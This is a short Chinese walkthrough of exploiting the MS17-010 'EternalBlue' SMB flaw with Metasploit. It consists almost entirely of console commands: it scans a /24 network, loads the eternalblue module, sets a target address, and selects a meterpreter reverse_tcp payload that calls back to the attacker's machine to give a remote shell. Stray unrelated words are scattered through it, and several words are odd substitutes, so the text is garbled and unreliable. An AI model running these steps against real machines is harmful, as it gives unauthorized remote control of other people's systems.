经过 MS17-010 “永恒之蓝” 来给你们演示一下MSF使用shell
@ 启动MSF
[msfconsole]
windows
@ 搜索MS17-010 模块 win7
[search ms17_010]
@ 切换到 use scanner/smb/smb/ms17_010
set RHOST 192.168.0.1/24
set THREADS 50
进行扫描win7系统框架
@ 使用“永恒之蓝”模块
[use exploit/windows/smb/ms17_010_eternalblue]。
tcp
@ 显示模块详细信息
[info]
测试
@ 显示受到该漏洞影响的操做系统
[show targets]
ui
根据要渗透测试的目标操做系统类型,能够使用[set target id] 设置。操作系统
@ 显示模块参数
[show options]
get
@ 设置渗透目标地址
[set RHOST 192.168.0.106]
it
@ 显示可用payload
[show payloads]
io
可用的payload 有不少,咱们通常选用meterpreter 框架下的tcp 反弹链接的payload。
@ 使用payload
[set payload windows/x64/meterpreter/reverse_tcp]
@ 设置payload 参数
[set LHOST 192.168.0.105] 本地地址
默认端口为4444。
@ 渗透攻击
[exploit]
@ 查看权限 [getuid] @显示meterpreter shell